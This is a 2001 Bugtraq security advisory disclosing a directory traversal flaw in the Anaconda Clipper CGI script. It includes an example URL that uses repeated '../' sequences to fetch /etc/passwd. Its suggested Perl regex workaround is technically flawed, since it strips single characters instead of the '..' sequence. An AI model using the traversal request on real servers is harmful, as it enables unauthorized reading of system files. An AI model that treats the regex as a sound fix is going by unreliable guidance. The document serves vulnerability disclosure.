[19867] in bugtraq
advisory
daemon@ATHENA.MIT.EDU (UkR hacking team)
Tue Mar 27 11:21:18 2001
Mime-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 8bit
Message-ID: <200103271423.RAA57334@fatlady.ukr.net>
Date: Tue, 27 Mar 2001 17:23:17 +0300
Reply-To: UkR hacking team <ukrteam@ukr.net>
From: UkR hacking team <ukrteam@ukr.net>
To: BUGTRAQ@SECURITYFOCUS.COM
---=== UkR security team - Advisory no. 11 ===---
Anaconda Clipper - 'arbitrary file retreival' vulnerability
Date: 27.03.2001
Problem: input validation error.
Vulnerable products: Anaconda Clipper ver. 3.3 (probably others, but not tested)
Product vendor: Anaconda / http://www.anaconda.net
Comment: '..' and '/' are not filtered while processing user input, so it is possible to enter arbitrary values to retreive files from remote sever, which should not be accessible normally (for ex., /etc/passwd).
Workaround:
# this will help in somewhat...
$input =~ s/[(\.\.)|\/]//g;
Author: UkR-XblP / UkR security team / http://www.ukrteam.ru
Example:
http://blah.somenonexistanthost.com/cgi-bin/anacondaclip.pl?template=../../../../../../../../../../../../../../../../../../etc/passwd
--------------------------------------------------------------------------------
UkR XblP
